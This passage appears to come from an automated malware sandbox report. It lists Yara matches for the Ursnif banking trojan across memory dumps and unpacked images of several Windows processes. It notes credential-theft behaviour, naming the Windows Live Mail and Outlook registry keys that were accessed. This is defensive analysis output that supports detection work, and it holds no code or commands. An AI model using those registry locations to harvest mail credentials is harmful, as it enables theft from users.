Source: Yara match File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: the same memory dump, process memory space and unpacked PE sources listed under Stealing of Sensitive Information above